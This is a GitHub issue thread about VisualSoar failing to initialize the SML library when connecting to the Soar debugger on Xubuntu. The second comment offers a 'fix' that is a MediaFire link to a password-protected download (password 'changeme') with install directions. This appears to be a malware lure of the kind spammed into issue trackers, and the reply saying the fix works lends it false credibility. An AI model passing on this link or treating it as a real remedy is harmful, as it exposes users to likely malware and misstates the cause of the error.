### ISSUE TITLE
VisualSoar cannot connect to soar debugger.

### ISSUE THREAD

**Issue by Angular-Angel** [SoarGroup/VisualSoar#33]
I followed all the steps in the Visual Soar Users Manual. I ran Visual Soar via the shell script, I checked to make sure that the `bin/java` folder is present, and that it contains sml.jar, and that `libSoar.so` is present in the bin folder itself. I checked the script to make sure it was managing to set the path correctly, and it was. By all accounts, the thing should work, but when I click connect in VisualSoar, it shows 'Exception when initializing the SML library. Check that SML.jar is on the path along with soar library."

This is on Xubuntu 24.04, using SoarSuite_9.6.3-Multiplatform, and java 21.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Angular-Angel** [comment]
It works! Thank you!
